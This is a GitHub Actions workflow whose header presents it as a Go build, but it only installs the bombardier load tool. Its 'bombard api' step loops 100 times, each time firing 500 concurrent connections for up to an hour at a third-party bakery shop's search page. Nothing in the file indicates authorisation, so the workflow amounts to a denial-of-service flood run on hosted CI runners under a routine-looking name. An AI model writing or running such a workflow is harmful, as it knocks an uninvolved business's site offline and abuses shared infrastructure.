# This workflow will build a golang project
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-go

name: Go

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:

  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3

    - name: Set up Go
      uses: actions/setup-go@v4
      with:
        go-version: '1.20'

    - name: Install bombardier
      run: go install github.com/codesenberg/bombardier@latest

    - name: Check version
      run: bombardier --version

    - name: bombard api
      run: |
        for i in {1..100} ; do
          bombardier -c 500 -l -t 3600s -m GET https://lakeviewmilkbar.in/search/?type=product&options%5Bunavailable_products%5D=last&options%5Bprefix%5D=last&q=cakes&section_id=search-hidden
        done
